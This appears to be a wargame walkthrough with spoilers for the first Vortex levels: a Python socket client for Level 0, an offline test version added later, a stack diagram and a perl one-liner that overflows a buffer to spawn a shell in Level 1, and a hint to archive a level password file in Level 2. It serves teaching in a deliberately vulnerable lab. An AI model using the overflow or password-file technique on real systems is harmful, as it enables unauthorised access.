Wicrawl Roadmap
Overview
This section contains some notes and solutions to the challenges on [1].
There are spoilers on this page, so don't read too far if you don't want your education to suffer.
Level 0
The instructions don't mention that you have to send the result back in binary, or that it should be a 64-bit integer ("long long"): four random 32-bit numbers usually add up to something larger than a 32-bit integer can hold. Here's one way to do it:
#!/usr/bin/env python3
import sys
from struct import pack, unpack
from socket import socket, AF_INET, SOCK_STREAM

s = socket(AF_INET, SOCK_STREAM)
s.connect(("vortex.labs.pulltheplug.org", 5842))
buf = b""
while len(buf) < 16:            # collect the four 32-bit ints, tolerating short reads
    chunk = s.recv(16 - len(buf))
    if not chunk:               # server closed the connection early
        sys.exit("connection closed after %d bytes" % len(buf))
    buf += chunk
print(len(buf))
ints = unpack("IIII", buf)      # four native-order unsigned 32-bit ints
result = ints[0] + ints[1] + ints[2] + ints[3]
print(result)
s.sendall(pack("Q", result))    # reply as a 64-bit int so the sum can't be truncated
print(s.recv(1000))
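Added example, not code from the original page: the same Level 0 handling done offline, with an exact-length read loop that fails cleanly if the connection closes early, explicit little-endian formats (an assumption about the server's byte order; the script above uses native order), and a constructed fake socket that returns deliberately short chunks so the logic can be checked without the network.

```python
#!/usr/bin/env python3
"""Level 0 pieces, testable offline: exact-length receive and the 64-bit reply."""
import struct

def recv_exact(sock, n):
    """Read exactly n bytes, looping over short reads; raise on early EOF."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf

def level0_reply(payload):
    """Sum four unsigned 32-bit ints and return the reply as 8 bytes ("long long")."""
    ints = struct.unpack("<IIII", payload)   # little-endian assumed
    total = sum(ints)                         # Python ints don't overflow; "<Q" holds it
    return struct.pack("<Q", total)

def fits_32bit(total):
    """True if the sum would survive being sent back as a 32-bit int."""
    return total < 2 ** 32

class FakeSocket:
    """Constructed stand-in for a socket that hands out data in short chunks."""
    def __init__(self, data, chunk=3):
        self.data = data
        self.chunk = chunk
    def recv(self, n):
        out = self.data[:min(n, self.chunk)]
        self.data = self.data[len(out):]
        return out

if __name__ == "__main__":
    # constructed worst case: four maximal 32-bit values, sum = 4 * 0xffffffff
    sock = FakeSocket(struct.pack("<IIII", *([0xffffffff] * 4)))
    data = recv_exact(sock, 16)
    reply = level0_reply(data)
    print(reply.hex(), fits_32bit(sum(struct.unpack("<IIII", data))))
```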
Level 1
The first thing we need to do is make a stack picture. It looks like this:
    ^  higher memory
    |
       RIP MSB
       RIP
       RIP
       RIP LSB
       EBP MSB
       EBP
       EBP
       EBP LSB
       buf[255]
       buf[254]
       . . .
       buf[0]
       ptr MSB   <-- target
       ptr
       ptr
       ptr LSB
    |
    v  lower memory
MSB stands for most significant byte, and LSB stands for least significant byte. Remember that on x86, the four bytes of a four-byte integer are stored in little-endian order, so the LSB is the first thing in memory if you're looking from low to high memory.
The trick here is to write two bytes after decrementing the pointer, because you have to trigger the call to e() after writing the 0xca overflow byte. Now, if you do something like this:
perl -e 'print "\\" x 257 . "\xca"' >> /tmp/slashes
/levels/level1 < /tmp/slashes
You'll see this:
bash-2.05b$ /levels/level1 < /tmp/slashes
sh-2.05b$ exit
bash-2.05b$
What happened?
Well, after the shell spawns, it tries to read commands from standard input. But you redirected its standard input from the file /tmp/slashes, and all of that file was already consumed to build the overflow. So the shell tries to read, gets an EOF, and treats it the same as the exit command in bash. Try it yourself: press CTRL-D, the UNIX end-of-file key, at a shell prompt and you'll be logged out immediately.
So that the exec'ed shell doesn't immediately read EOF and quit, you can cut and paste the overflow string to the terminal while executing level1 interactively. That way, your keyboard will be connected to the spawned shell's standard input, and you can run commands.
Level 2
Just create a tar archive. But what to put in it? The password, of course, which is in /etc/pass/level3.